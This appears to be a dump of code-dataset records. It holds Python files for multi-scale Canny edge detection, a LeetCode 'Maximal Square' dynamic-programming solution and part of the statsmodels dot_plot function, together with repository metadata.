(im[i, j+1] == strong) or (im[i-1, j-1] == strong) or (im[i-1, j] == strong) or (im[i-1, j+1] == strong)): im[i, j] = strong else: im[i, j] = 0 return im def rgb2gray(rgb): """Transform 3 colors channels image to grayscale Parameters ---------- rgb input image rgb Returns ------- np.dot grayscale image """ return np.dot(rgb[...,:3], [0.2989, 0.5870, 0.1140]) def canny(origin_img): """Applies Canny Edge Detection Steps Parameters ---------- origin_img input original image Returns ------- im_final final output edge-detected image """ origin_img = rgb2gray(origin_img) origin_img = origin_img/255.0 # blur image with Gaussian filter with sigma = 2,8,16 filtered_im1 = cv.GaussianBlur(origin_img, (0,0), 2) filtered_im2 = cv.GaussianBlur(origin_img, (0,0), 8) filtered_im3 = cv.GaussianBlur(origin_img, (0,0), 16) # apply Canny edge detectors with the scales you choose to detect edges grad_mag1, angle1 = get_sobel_kernel(filtered_im1) grad_mag2, angle2 = get_sobel_kernel(filtered_im2) grad_mag3, angle3 = get_sobel_kernel(filtered_im3) # apply non-max-suppression im_nms1 = non_max_supression(grad_mag1, angle1) im_nms2 = non_max_supression(grad_mag2, angle2) im_nms3 = non_max_supression(grad_mag3, angle3) im_thres1, weak1, strong1 = double_threshold(im_nms1, ltr=0.07, htr=0.19) im_thres2, weak2, strong2 = double_threshold(im_nms2, ltr=0.07, htr=0.19) im_thres3, weak3, strong3 = double_threshold(im_nms3, ltr=0.07, htr=0.19) im_hys1 = hysteresis(im_thres1, weak1, strong1) im_hys2 = hysteresis(im_thres2, weak2, strong2) im_hys3 = hysteresis(im_thres3, weak3, strong3) im_final = im_hys1 + im_hys2 + im_hys3 im_final = im_final/3.0 # convert two 3 dim if (im_final.ndim == 2): im_final = np.expand_dims(im_final, axis = 2) return im_final
27.602679
122
0.569303
import math import cv2 as cv import numpy as np from scipy.ndimage.filters import convolve from scipy import ndimage from matplotlib import pyplot as plt import matplotlib.image as mpimg def get_sobel_kernel(im): """Takes in smoothed images then do matrix multiplication with Sobel kernel to get the gradient magnitude and angle Parameters ---------- im input image Returns ------- gradient gradient magnitude of sobel filter theta the angle of sobel filter """ kernel_x = np.array([[-1, 0, 1], [-2, 0, 2], [-1, 0, 1]], np.float32) kernel_y = np.array([[1, 2, 1], [0, 0, 0], [-1, -2, -1]], np.float32) image_x = ndimage.filters.convolve(im, kernel_x) image_y = ndimage.filters.convolve(im, kernel_y) gradient = np.hypot(image_x, image_y) gradient = gradient / gradient.max() * 255 theta = np.arctan2(image_y, image_x) return (gradient, theta) def non_max_supression(grad_im, theta): """Goes thru all points on the gradient intensity matrix to finds the pixels with the max value in the edge directions Parameters ---------- grad_im gradient magnitude from sobel filter theta angle from sobel filter Returns ------- out_im output image """ row, col = grad_im.shape # M, N out_im = np.zeros((row, col), dtype=np.int32) angle = theta*180. 
/ np.pi angle[angle < 0] += 180 for i in range(1,row-1): for j in range(1,col-1): q = 255 r = 255 # for angle 0 if (0 <= angle[i,j] < 22.5) or (157.5 <= angle[i,j] <= 180): q = grad_im[i, j+1] r = grad_im[i, j-1] # for angle 45 elif (22.5 <= angle[i,j] < 67.5): q = grad_im[i+1, j-1] r = grad_im[i-1, j+1] # for angle 90 elif (67.5 <= angle[i,j] < 112.5): q = grad_im[i+1, j] r = grad_im[i-1, j] # for angle 135 elif (112.5 <= angle[i,j] < 157.5): q = grad_im[i-1, j-1] r = grad_im[i+1, j+1] if (grad_im[i,j] >= q) and (grad_im[i,j] >= r): out_im[i,j] = grad_im[i,j] else: out_im[i,j] = 0 return out_im def double_threshold(im, ltr, htr): """Double threshold aim to identify strong, weak, and non-relevant pixels Parameters ---------- im input image ltr low threshold ratio htr high threshold ratio Returns ------- weak weak pixel that has intensity value that is not enough to be considered strong ones, but not non-relevant strong pixel with very high intensity res non-relevant pixel, not high, not low """ high_thres = im.max() * htr low_thres = high_thres * ltr row, col = im.shape res = np.zeros((row,col), dtype=np.int32) weak = np.int32(25) strong = np.int32(255) strong_i, strong_j = np.where(im >= high_thres) zeros_i, zeros_j = np.where(im < low_thres) weak_i, weak_j = np.where((im <= high_thres) & (im >= low_thres)) res[strong_i, strong_j] = strong res[weak_i, weak_j] = weak return (res, weak, strong) def hysteresis(im, weak, strong=255): """Transforms weak pixel into strong ones if at least 1 pixel around the one being processed is a strong one Parameters ---------- im input image weak weak pixel that has intensity value that is not enough to be considered strong ones, but not non-relevant strong pixel with very high intensity Returns ------- im output result image """ row, col = im.shape for i in range(1, row-1): for j in range(1, col-1): if (im[i,j] == weak): if ((im[i+1, j-1] == strong) or (im[i+1, j] == strong) or (im[i+1, j+1] == strong) or (im[i, j-1] == strong) or 
(im[i, j+1] == strong) or (im[i-1, j-1] == strong) or (im[i-1, j] == strong) or (im[i-1, j+1] == strong)): im[i, j] = strong else: im[i, j] = 0 return im def rgb2gray(rgb): """Transform 3 colors channels image to grayscale Parameters ---------- rgb input image rgb Returns ------- np.dot grayscale image """ return np.dot(rgb[...,:3], [0.2989, 0.5870, 0.1140]) def canny(origin_img): """Applies Canny Edge Detection Steps Parameters ---------- origin_img input original image Returns ------- im_final final output edge-detected image """ origin_img = rgb2gray(origin_img) origin_img = origin_img/255.0 # blur image with Gaussian filter with sigma = 2,8,16 filtered_im1 = cv.GaussianBlur(origin_img, (0,0), 2) filtered_im2 = cv.GaussianBlur(origin_img, (0,0), 8) filtered_im3 = cv.GaussianBlur(origin_img, (0,0), 16) # apply Canny edge detectors with the scales you choose to detect edges grad_mag1, angle1 = get_sobel_kernel(filtered_im1) grad_mag2, angle2 = get_sobel_kernel(filtered_im2) grad_mag3, angle3 = get_sobel_kernel(filtered_im3) # apply non-max-suppression im_nms1 = non_max_supression(grad_mag1, angle1) im_nms2 = non_max_supression(grad_mag2, angle2) im_nms3 = non_max_supression(grad_mag3, angle3) im_thres1, weak1, strong1 = double_threshold(im_nms1, ltr=0.07, htr=0.19) im_thres2, weak2, strong2 = double_threshold(im_nms2, ltr=0.07, htr=0.19) im_thres3, weak3, strong3 = double_threshold(im_nms3, ltr=0.07, htr=0.19) im_hys1 = hysteresis(im_thres1, weak1, strong1) im_hys2 = hysteresis(im_thres2, weak2, strong2) im_hys3 = hysteresis(im_thres3, weak3, strong3) im_final = im_hys1 + im_hys2 + im_hys3 im_final = im_final/3.0 # convert two 3 dim if (im_final.ndim == 2): im_final = np.expand_dims(im_final, axis = 2) return im_final
0
0
0
45440d5a96a0fad81f3cedc890db5f5adc5e505e
3,586
py
Python
Python/221.maximal-square.py
Dxyk/LeetCode
e64b405f40b4e3c0f14c617897b775699dd46872
[ "MIT" ]
null
null
null
Python/221.maximal-square.py
Dxyk/LeetCode
e64b405f40b4e3c0f14c617897b775699dd46872
[ "MIT" ]
null
null
null
Python/221.maximal-square.py
Dxyk/LeetCode
e64b405f40b4e3c0f14c617897b775699dd46872
[ "MIT" ]
null
null
null
# # @lc app=leetcode id=221 lang=python3 # # [221] Maximal Square # # https://leetcode.com/problems/maximal-square/description/ # # algorithms # Medium (34.82%) # Likes: 1997 # Dislikes: 49 # Total Accepted: 175K # Total Submissions: 500.4K # Testcase Example: # '[["1","0","1","0","0"], # ["1","0","1","1","1"], # ["1","1","1","1","1"], # ["1","0","0","1","0"]]' # # Given a 2D binary matrix filled with 0's and 1's, find the largest square # containing only 1's and return its area. # # Example: # # # Input: # # 1 0 1 0 0 # 1 0 1 1 1 # 1 1 1 1 1 # 1 0 0 1 0 # # Output: 4 # # # @lc code=start from typing import List # @lc code=end if __name__ == "__main__": m = [["1", "0", "1", "0", "0"], ["1", "0", "1", "1", "1"], ["1", "1", "1", "1", "1"], ["1", "0", "0", "1", "0"]] print(Solution().maximalSquare(m), 4)
27.374046
75
0.444228
# # @lc app=leetcode id=221 lang=python3 # # [221] Maximal Square # # https://leetcode.com/problems/maximal-square/description/ # # algorithms # Medium (34.82%) # Likes: 1997 # Dislikes: 49 # Total Accepted: 175K # Total Submissions: 500.4K # Testcase Example: # '[["1","0","1","0","0"], # ["1","0","1","1","1"], # ["1","1","1","1","1"], # ["1","0","0","1","0"]]' # # Given a 2D binary matrix filled with 0's and 1's, find the largest square # containing only 1's and return its area. # # Example: # # # Input: # # 1 0 1 0 0 # 1 0 1 1 1 # 1 1 1 1 1 # 1 0 0 1 0 # # Output: 4 # # # @lc code=start from typing import List class Solution: def maximalSquare(self, matrix: List[List[str]]) -> int: return self.dp_improved_bottom_up(matrix) def dp_improved_bottom_up(self, matrix: List[List[str]]) -> int: """ DP Bottom up solution with improved space efficiency Runtime: O(mn) Space: O(n) """ if len(matrix) == 0 or len(matrix[0]) == 0: return 0 res_len = 0 prev = 0 memo = [0] * (len(matrix[0]) + 1) for i in range(1, len(matrix) + 1): for j in range(1, len(matrix[0]) + 1): temp = memo[j] if matrix[i - 1][j - 1] == "1": memo[j] = min(memo[j - 1], prev, memo[j]) + 1 res_len = max(memo[j], res_len) else: memo[j] = 0 prev = temp return res_len ** 2 def dp_bottom_up(self, matrix: List[List[str]]) -> int: """ DP Bottom up solution Runtime: O(mn) Space: O(mn) """ if len(matrix) == 0 or len(matrix[0]) == 0: return 0 res_len = 0 memo = [[0] * (len(matrix[0]) + 1) for _ in range(len(matrix) + 1)] for i in range(1, len(matrix) + 1): for j in range(1, len(matrix[0]) + 1): if matrix[i - 1][j - 1] == "1": memo[i][j] = min(memo[i - 1][j], memo[i][j - 1], memo[i - 1][j - 1]) + 1 res_len = max(memo[i][j], res_len) return res_len ** 2 def dp_recursive(self, matrix: List[List[str]]) -> int: """ DP Recursive solution Subproblem Structure: Let m = num rows, n = num cols P(i, j) := max area's length using the element at matrix[i][j] P(i, j) = - 0 if matrix[i][j] == "0" - min(P(i - 1, j), P(i, j - 1), P(i 
- 1, j - 1)) + 1 if matrix[i][j] == "1" """ if len(matrix) == 0 or len(matrix[0]) == 0: return 0 res_len = [0] def helper(i: int, j: int) -> int: if i < 0 or j < 0: return 0 if i == 0 or j == 0: return 1 if matrix[i][j] == "1" else 0 top_res = helper(i, j - 1) left_res = helper(i - 1, j) top_left_res = helper(i - 1, j - 1) if matrix[i][j] == "1": res = min(top_res, left_res, top_left_res) + 1 else: res = 0 res_len[0] = max(res, res_len[0]) return res helper(len(matrix) - 1, len(matrix[0]) - 1) return res_len[0] ** 2 # @lc code=end if __name__ == "__main__": m = [["1", "0", "1", "0", "0"], ["1", "0", "1", "1", "1"], ["1", "1", "1", "1", "1"], ["1", "0", "0", "1", "0"]] print(Solution().maximalSquare(m), 4)
579
2,115
23
5db5e96c68daebdf9c023c5d9ea8446b92163a47
17,891
py
Python
statsmodels/graphics/dotplots.py
nikhase/statsmodels
e1822d4513f442002816bb898ca5794785f35c32
[ "BSD-3-Clause" ]
15
2015-03-03T09:47:42.000Z
2022-01-05T18:28:31.000Z
statsmodels/graphics/dotplots.py
nikhase/statsmodels
e1822d4513f442002816bb898ca5794785f35c32
[ "BSD-3-Clause" ]
7
2015-11-20T08:33:04.000Z
2020-07-24T19:34:39.000Z
statsmodels/graphics/dotplots.py
nikhase/statsmodels
e1822d4513f442002816bb898ca5794785f35c32
[ "BSD-3-Clause" ]
14
2015-01-06T22:08:34.000Z
2021-01-01T16:33:23.000Z
import numpy as np from statsmodels.compat import range from . import utils def dot_plot(points, intervals=None, lines=None, sections=None, styles=None, marker_props=None, line_props=None, split_names=None, section_order=None, line_order=None, stacked=False, styles_order=None, striped=False, horizontal=True, show_names="both", fmt_left_name=None, fmt_right_name=None, show_section_titles=None, ax=None): """ Produce a dotplot similar in style to those in Cleveland's "Visualizing Data" book. These are also known as "forest plots". Parameters ---------- points : array_like The quantitative values to be plotted as markers. intervals : array_like The intervals to be plotted around the points. The elements of `intervals` are either scalars or sequences of length 2. A scalar indicates the half width of a symmetric interval. A sequence of length 2 contains the left and right half-widths (respectively) of a nonsymmetric interval. If None, no intervals are drawn. lines : array_like A grouping variable indicating which points/intervals are drawn on a common line. If None, each point/interval appears on its own line. sections : array_like A grouping variable indicating which lines are grouped into sections. If None, everything is drawn in a single section. styles : array_like A grouping label defining the plotting style of the markers and intervals. marker_props : dict A dictionary mapping style codes (the values in `styles`) to dictionaries defining key/value pairs to be passed as keyword arguments to `plot` when plotting markers. Useful keyword arguments are "color", "marker", and "ms" (marker size). line_props : dict A dictionary mapping style codes (the values in `styles`) to dictionaries defining key/value pairs to be passed as keyword arguments to `plot` when plotting interval lines. Useful keyword arguments are "color", "linestyle", "solid_capstyle", and "linewidth". 
split_names : string If not None, this is used to split the values of `lines` into substrings that are drawn in the left and right margins, respectively. If None, the values of `lines` are drawn in the left margin. section_order : array_like The section labels in the order in which they appear in the dotplot. line_order : array_like The line labels in the order in which they appear in the dotplot. stacked : boolean If True, when multiple points or intervals are drawn on the same line, they are offset from each other. styles_order : array_like If stacked=True, this is the order in which the point styles on a given line are drawn from top to bottom (if horizontal is True) or from left to right (if horiontal is False). If None (default), the order is lexical. striped : boolean If True, every other line is enclosed in a shaded box. horizontal : boolean If True (default), the lines are drawn horizontally, otherwise they are drawn vertically. show_names : string Determines whether labels (names) are shown in the left and/or right margins (top/bottom margins if `horizontal` is True). If `both`, labels are drawn in both margins, if 'left', labels are drawn in the left or top margin. If `right`, labels are drawn in the right or bottom margin. fmt_left_name : function The left/top margin names are passed through this function before drawing on the plot. fmt_right_name : function The right/bottom marginnames are passed through this function before drawing on the plot. show_section_titles : bool or None If None, section titles are drawn only if there is more than one section. If False/True, section titles are never/always drawn, respectively. ax : matplotlib.axes The axes on which the dotplot is drawn. If None, a new axes is created. Returns ------- fig : Figure The figure given by `ax.figure` or a new instance. Notes ----- `points`, `intervals`, `lines`, `sections`, `styles` must all have the same length whenever present. 
Examples -------- This is a simple dotplot with one point per line: >>> dot_plot(points=point_values) This dotplot has labels on the lines (if elements in `label_values` are repeated, the corresponding points appear on the same line): >>> dot_plot(points=point_values, lines=label_values) References ---------- * Cleveland, William S. (1993). "Visualizing Data". Hobart Press. * Jacoby, William G. (2006) "The Dot Plot: A Graphical Display for Labeled Quantitative Values." The Political Methodologist 14(1): 6-14. """ import matplotlib.transforms as transforms fig, ax = utils.create_mpl_ax(ax) # Convert to numpy arrays if that is not what we are given. points = np.asarray(points) asarray_or_none = lambda x : None if x is None else np.asarray(x) intervals = asarray_or_none(intervals) lines = asarray_or_none(lines) sections = asarray_or_none(sections) styles = asarray_or_none(styles) # Total number of points npoint = len(points) # Set default line values if needed if lines is None: lines = np.arange(npoint) # Set default section values if needed if sections is None: sections = np.zeros(npoint) # Set default style values if needed if styles is None: styles = np.zeros(npoint) # The vertical space (in inches) for a section title section_title_space = 0.5 # The number of sections nsect = len(set(sections)) if section_order is not None: nsect = len(set(section_order)) # The number of section titles if show_section_titles == False: draw_section_titles = False nsect_title = 0 elif show_section_titles == True: draw_section_titles = True nsect_title = nsect else: draw_section_titles = nsect > 1 nsect_title = nsect if nsect > 1 else 0 # The total vertical space devoted to section titles. section_space_total = section_title_space * nsect_title # Add a bit of room so that points that fall at the axis limits # are not cut in half. 
ax.set_xmargin(0.02) ax.set_ymargin(0.02) if section_order is None: lines0 = list(set(sections)) lines0.sort() else: lines0 = section_order if line_order is None: lines1 = list(set(lines)) lines1.sort() else: lines1 = line_order # A map from (section,line) codes to index positions. lines_map = {} for i in range(npoint): if section_order is not None and sections[i] not in section_order: continue if line_order is not None and lines[i] not in line_order: continue ky = (sections[i], lines[i]) if ky not in lines_map: lines_map[ky] = [] lines_map[ky].append(i) # Get the size of the axes on the parent figure in inches bbox = ax.get_window_extent().transformed( fig.dpi_scale_trans.inverted()) awidth, aheight = bbox.width, bbox.height # The number of lines in the plot. nrows = len(lines_map) # The positions of the lowest and highest guideline in axes # coordinates (for horizontal dotplots), or the leftmost and # rightmost guidelines (for vertical dotplots). bottom, top = 0, 1 if horizontal: # x coordinate is data, y coordinate is axes trans = transforms.blended_transform_factory(ax.transData, ax.transAxes) else: # x coordinate is axes, y coordinate is data trans = transforms.blended_transform_factory(ax.transAxes, ax.transData) # Space used for a section title, in axes coordinates title_space_axes = section_title_space / aheight # Space between lines if horizontal: dpos = (top - bottom - nsect_title*title_space_axes) /\ float(nrows) else: dpos = (top - bottom) / float(nrows) # Determine the spacing for stacked points if styles_order is not None: style_codes = styles_order else: style_codes = list(set(styles)) style_codes.sort() # Order is top to bottom for horizontal plots, so need to # flip. if horizontal: style_codes = style_codes[::-1] # nval is the maximum number of points on one line. nval = len(style_codes) if nval > 1: stackd = dpos / (2.5*(float(nval)-1)) else: stackd = 0. 
# Map from style code to its integer position style_codes_map = {x: style_codes.index(x) for x in style_codes} # Setup default marker styles colors = ["r", "g", "b", "y", "k", "purple", "orange"] if marker_props is None: marker_props = {x: {} for x in style_codes} for j in range(nval): sc = style_codes[j] if "color" not in marker_props[sc]: marker_props[sc]["color"] = colors[j % len(colors)] if "marker" not in marker_props[sc]: marker_props[sc]["marker"] = "o" if "ms" not in marker_props[sc]: marker_props[sc]["ms"] = 10 if stackd == 0 else 6 # Setup default line styles if line_props is None: line_props = {x: {} for x in style_codes} for j in range(nval): sc = style_codes[j] if "color" not in line_props[sc]: line_props[sc]["color"] = "grey" if "linewidth" not in line_props[sc]: line_props[sc]["linewidth"] = 2 if stackd > 0 else 8 if horizontal: # The vertical position of the first line. pos = top - dpos/2 if nsect == 1 else top else: # The horizontal position of the first line. pos = bottom + dpos/2 # Points that have already been labeled labeled = set() # Positions of the y axis grid lines ticks = [] # Loop through the sections for k0 in lines0: # Draw a section title if draw_section_titles: if horizontal: y0 = pos + dpos/2 if k0 == lines0[0] else pos ax.fill_between((0, 1), (y0,y0), (pos-0.7*title_space_axes, pos-0.7*title_space_axes), color='darkgrey', transform=ax.transAxes, zorder=1) txt = ax.text(0.5, pos - 0.35*title_space_axes, k0, horizontalalignment='center', verticalalignment='center', transform=ax.transAxes) txt.set_fontweight("bold") pos -= title_space_axes else: m = len([k for k in lines_map if k[0] == k0]) ax.fill_between((pos-dpos/2+0.01, pos+(m-1)*dpos+dpos/2-0.01), (1.01,1.01), (1.06,1.06), color='darkgrey', transform=ax.transAxes, zorder=1, clip_on=False) txt = ax.text(pos + (m-1)*dpos/2, 1.02, k0, horizontalalignment='center', verticalalignment='bottom', transform=ax.transAxes) txt.set_fontweight("bold") jrow = 0 for k1 in lines1: # No data to 
plot if (k0, k1) not in lines_map: continue # Draw the guideline if horizontal: ax.axhline(pos, color='grey') else: ax.axvline(pos, color='grey') # Set up the labels if split_names is not None: us = k1.split(split_names) if len(us) >= 2: left_label, right_label = us[0], us[1] else: left_label, right_label = k1, None else: left_label, right_label = k1, None if fmt_left_name is not None: left_label = fmt_left_name(left_label) if fmt_right_name is not None: right_label = fmt_right_name(right_label) # Draw the stripe if striped and jrow % 2 == 0: if horizontal: ax.fill_between((0, 1), (pos-dpos/2, pos-dpos/2), (pos+dpos/2, pos+dpos/2), color='lightgrey', transform=ax.transAxes, zorder=0) else: ax.fill_between((pos-dpos/2, pos+dpos/2), (0, 0), (1, 1), color='lightgrey', transform=ax.transAxes, zorder=0) jrow += 1 # Draw the left margin label if show_names.lower() in ("left", "both"): if horizontal: ax.text(-0.1/awidth, pos, left_label, horizontalalignment="right", verticalalignment='center', transform=ax.transAxes, family='monospace') else: ax.text(pos, -0.1/aheight, left_label, horizontalalignment="center", verticalalignment='top', transform=ax.transAxes, family='monospace') # Draw the right margin label if show_names.lower() in ("right", "both"): if right_label is not None: if horizontal: ax.text(1 + 0.1/awidth, pos, right_label, horizontalalignment="left", verticalalignment='center', transform=ax.transAxes, family='monospace') else: ax.text(pos, 1 + 0.1/aheight, right_label, horizontalalignment="center", verticalalignment='bottom', transform=ax.transAxes, family='monospace') # Save the vertical position so that we can place the # tick marks ticks.append(pos) # Loop over the points in one line for ji,jp in enumerate(lines_map[(k0,k1)]): # Calculate the vertical offset yo = 0 if stacked: yo = -dpos/5 + style_codes_map[styles[jp]]*stackd pt = points[jp] # Plot the interval if intervals is not None: # Symmetric interval if np.isscalar(intervals[jp]): lcb, ucb = pt - 
intervals[jp],\ pt + intervals[jp] # Nonsymmetric interval else: lcb, ucb = pt - intervals[jp][0],\ pt + intervals[jp][1] # Draw the interval if horizontal: ax.plot([lcb, ucb], [pos+yo, pos+yo], '-', transform=trans, **line_props[styles[jp]]) else: ax.plot([pos+yo, pos+yo], [lcb, ucb], '-', transform=trans, **line_props[styles[jp]]) # Plot the point sl = styles[jp] sll = sl if sl not in labeled else None labeled.add(sl) if horizontal: ax.plot([pt,], [pos+yo,], ls='None', transform=trans, label=sll, **marker_props[sl]) else: ax.plot([pos+yo,], [pt,], ls='None', transform=trans, label=sll, **marker_props[sl]) if horizontal: pos -= dpos else: pos += dpos # Set up the axis if horizontal: ax.xaxis.set_ticks_position("bottom") ax.yaxis.set_ticks_position("none") ax.set_yticklabels([]) ax.spines['left'].set_color('none') ax.spines['right'].set_color('none') ax.spines['top'].set_color('none') ax.spines['bottom'].set_position(('axes', -0.1/aheight)) ax.set_ylim(0, 1) ax.yaxis.set_ticks(ticks) ax.autoscale_view(scaley=False, tight=True) else: ax.yaxis.set_ticks_position("left") ax.xaxis.set_ticks_position("none") ax.set_xticklabels([]) ax.spines['bottom'].set_color('none') ax.spines['right'].set_color('none') ax.spines['top'].set_color('none') ax.spines['left'].set_position(('axes', -0.1/awidth)) ax.set_xlim(0, 1) ax.xaxis.set_ticks(ticks) ax.autoscale_view(scalex=False, tight=True) return fig
36.737166
74
0.54519
import numpy as np from statsmodels.compat import range from . import utils def dot_plot(points, intervals=None, lines=None, sections=None, styles=None, marker_props=None, line_props=None, split_names=None, section_order=None, line_order=None, stacked=False, styles_order=None, striped=False, horizontal=True, show_names="both", fmt_left_name=None, fmt_right_name=None, show_section_titles=None, ax=None): """ Produce a dotplot similar in style to those in Cleveland's "Visualizing Data" book. These are also known as "forest plots". Parameters ---------- points : array_like The quantitative values to be plotted as markers. intervals : array_like The intervals to be plotted around the points. The elements of `intervals` are either scalars or sequences of length 2. A scalar indicates the half width of a symmetric interval. A sequence of length 2 contains the left and right half-widths (respectively) of a nonsymmetric interval. If None, no intervals are drawn. lines : array_like A grouping variable indicating which points/intervals are drawn on a common line. If None, each point/interval appears on its own line. sections : array_like A grouping variable indicating which lines are grouped into sections. If None, everything is drawn in a single section. styles : array_like A grouping label defining the plotting style of the markers and intervals. marker_props : dict A dictionary mapping style codes (the values in `styles`) to dictionaries defining key/value pairs to be passed as keyword arguments to `plot` when plotting markers. Useful keyword arguments are "color", "marker", and "ms" (marker size). line_props : dict A dictionary mapping style codes (the values in `styles`) to dictionaries defining key/value pairs to be passed as keyword arguments to `plot` when plotting interval lines. Useful keyword arguments are "color", "linestyle", "solid_capstyle", and "linewidth". 
split_names : string If not None, this is used to split the values of `lines` into substrings that are drawn in the left and right margins, respectively. If None, the values of `lines` are drawn in the left margin. section_order : array_like The section labels in the order in which they appear in the dotplot. line_order : array_like The line labels in the order in which they appear in the dotplot. stacked : boolean If True, when multiple points or intervals are drawn on the same line, they are offset from each other. styles_order : array_like If stacked=True, this is the order in which the point styles on a given line are drawn from top to bottom (if horizontal is True) or from left to right (if horiontal is False). If None (default), the order is lexical. striped : boolean If True, every other line is enclosed in a shaded box. horizontal : boolean If True (default), the lines are drawn horizontally, otherwise they are drawn vertically. show_names : string Determines whether labels (names) are shown in the left and/or right margins (top/bottom margins if `horizontal` is True). If `both`, labels are drawn in both margins, if 'left', labels are drawn in the left or top margin. If `right`, labels are drawn in the right or bottom margin. fmt_left_name : function The left/top margin names are passed through this function before drawing on the plot. fmt_right_name : function The right/bottom marginnames are passed through this function before drawing on the plot. show_section_titles : bool or None If None, section titles are drawn only if there is more than one section. If False/True, section titles are never/always drawn, respectively. ax : matplotlib.axes The axes on which the dotplot is drawn. If None, a new axes is created. Returns ------- fig : Figure The figure given by `ax.figure` or a new instance. Notes ----- `points`, `intervals`, `lines`, `sections`, `styles` must all have the same length whenever present. 
Examples -------- This is a simple dotplot with one point per line: >>> dot_plot(points=point_values) This dotplot has labels on the lines (if elements in `label_values` are repeated, the corresponding points appear on the same line): >>> dot_plot(points=point_values, lines=label_values) References ---------- * Cleveland, William S. (1993). "Visualizing Data". Hobart Press. * Jacoby, William G. (2006) "The Dot Plot: A Graphical Display for Labeled Quantitative Values." The Political Methodologist 14(1): 6-14. """ import matplotlib.transforms as transforms fig, ax = utils.create_mpl_ax(ax) # Convert to numpy arrays if that is not what we are given. points = np.asarray(points) asarray_or_none = lambda x : None if x is None else np.asarray(x) intervals = asarray_or_none(intervals) lines = asarray_or_none(lines) sections = asarray_or_none(sections) styles = asarray_or_none(styles) # Total number of points npoint = len(points) # Set default line values if needed if lines is None: lines = np.arange(npoint) # Set default section values if needed if sections is None: sections = np.zeros(npoint) # Set default style values if needed if styles is None: styles = np.zeros(npoint) # The vertical space (in inches) for a section title section_title_space = 0.5 # The number of sections nsect = len(set(sections)) if section_order is not None: nsect = len(set(section_order)) # The number of section titles if show_section_titles == False: draw_section_titles = False nsect_title = 0 elif show_section_titles == True: draw_section_titles = True nsect_title = nsect else: draw_section_titles = nsect > 1 nsect_title = nsect if nsect > 1 else 0 # The total vertical space devoted to section titles. section_space_total = section_title_space * nsect_title # Add a bit of room so that points that fall at the axis limits # are not cut in half. 
ax.set_xmargin(0.02) ax.set_ymargin(0.02) if section_order is None: lines0 = list(set(sections)) lines0.sort() else: lines0 = section_order if line_order is None: lines1 = list(set(lines)) lines1.sort() else: lines1 = line_order # A map from (section,line) codes to index positions. lines_map = {} for i in range(npoint): if section_order is not None and sections[i] not in section_order: continue if line_order is not None and lines[i] not in line_order: continue ky = (sections[i], lines[i]) if ky not in lines_map: lines_map[ky] = [] lines_map[ky].append(i) # Get the size of the axes on the parent figure in inches bbox = ax.get_window_extent().transformed( fig.dpi_scale_trans.inverted()) awidth, aheight = bbox.width, bbox.height # The number of lines in the plot. nrows = len(lines_map) # The positions of the lowest and highest guideline in axes # coordinates (for horizontal dotplots), or the leftmost and # rightmost guidelines (for vertical dotplots). bottom, top = 0, 1 if horizontal: # x coordinate is data, y coordinate is axes trans = transforms.blended_transform_factory(ax.transData, ax.transAxes) else: # x coordinate is axes, y coordinate is data trans = transforms.blended_transform_factory(ax.transAxes, ax.transData) # Space used for a section title, in axes coordinates title_space_axes = section_title_space / aheight # Space between lines if horizontal: dpos = (top - bottom - nsect_title*title_space_axes) /\ float(nrows) else: dpos = (top - bottom) / float(nrows) # Determine the spacing for stacked points if styles_order is not None: style_codes = styles_order else: style_codes = list(set(styles)) style_codes.sort() # Order is top to bottom for horizontal plots, so need to # flip. if horizontal: style_codes = style_codes[::-1] # nval is the maximum number of points on one line. nval = len(style_codes) if nval > 1: stackd = dpos / (2.5*(float(nval)-1)) else: stackd = 0. 
# Map from style code to its integer position style_codes_map = {x: style_codes.index(x) for x in style_codes} # Setup default marker styles colors = ["r", "g", "b", "y", "k", "purple", "orange"] if marker_props is None: marker_props = {x: {} for x in style_codes} for j in range(nval): sc = style_codes[j] if "color" not in marker_props[sc]: marker_props[sc]["color"] = colors[j % len(colors)] if "marker" not in marker_props[sc]: marker_props[sc]["marker"] = "o" if "ms" not in marker_props[sc]: marker_props[sc]["ms"] = 10 if stackd == 0 else 6 # Setup default line styles if line_props is None: line_props = {x: {} for x in style_codes} for j in range(nval): sc = style_codes[j] if "color" not in line_props[sc]: line_props[sc]["color"] = "grey" if "linewidth" not in line_props[sc]: line_props[sc]["linewidth"] = 2 if stackd > 0 else 8 if horizontal: # The vertical position of the first line. pos = top - dpos/2 if nsect == 1 else top else: # The horizontal position of the first line. pos = bottom + dpos/2 # Points that have already been labeled labeled = set() # Positions of the y axis grid lines ticks = [] # Loop through the sections for k0 in lines0: # Draw a section title if draw_section_titles: if horizontal: y0 = pos + dpos/2 if k0 == lines0[0] else pos ax.fill_between((0, 1), (y0,y0), (pos-0.7*title_space_axes, pos-0.7*title_space_axes), color='darkgrey', transform=ax.transAxes, zorder=1) txt = ax.text(0.5, pos - 0.35*title_space_axes, k0, horizontalalignment='center', verticalalignment='center', transform=ax.transAxes) txt.set_fontweight("bold") pos -= title_space_axes else: m = len([k for k in lines_map if k[0] == k0]) ax.fill_between((pos-dpos/2+0.01, pos+(m-1)*dpos+dpos/2-0.01), (1.01,1.01), (1.06,1.06), color='darkgrey', transform=ax.transAxes, zorder=1, clip_on=False) txt = ax.text(pos + (m-1)*dpos/2, 1.02, k0, horizontalalignment='center', verticalalignment='bottom', transform=ax.transAxes) txt.set_fontweight("bold") jrow = 0 for k1 in lines1: # No data to 
plot if (k0, k1) not in lines_map: continue # Draw the guideline if horizontal: ax.axhline(pos, color='grey') else: ax.axvline(pos, color='grey') # Set up the labels if split_names is not None: us = k1.split(split_names) if len(us) >= 2: left_label, right_label = us[0], us[1] else: left_label, right_label = k1, None else: left_label, right_label = k1, None if fmt_left_name is not None: left_label = fmt_left_name(left_label) if fmt_right_name is not None: right_label = fmt_right_name(right_label) # Draw the stripe if striped and jrow % 2 == 0: if horizontal: ax.fill_between((0, 1), (pos-dpos/2, pos-dpos/2), (pos+dpos/2, pos+dpos/2), color='lightgrey', transform=ax.transAxes, zorder=0) else: ax.fill_between((pos-dpos/2, pos+dpos/2), (0, 0), (1, 1), color='lightgrey', transform=ax.transAxes, zorder=0) jrow += 1 # Draw the left margin label if show_names.lower() in ("left", "both"): if horizontal: ax.text(-0.1/awidth, pos, left_label, horizontalalignment="right", verticalalignment='center', transform=ax.transAxes, family='monospace') else: ax.text(pos, -0.1/aheight, left_label, horizontalalignment="center", verticalalignment='top', transform=ax.transAxes, family='monospace') # Draw the right margin label if show_names.lower() in ("right", "both"): if right_label is not None: if horizontal: ax.text(1 + 0.1/awidth, pos, right_label, horizontalalignment="left", verticalalignment='center', transform=ax.transAxes, family='monospace') else: ax.text(pos, 1 + 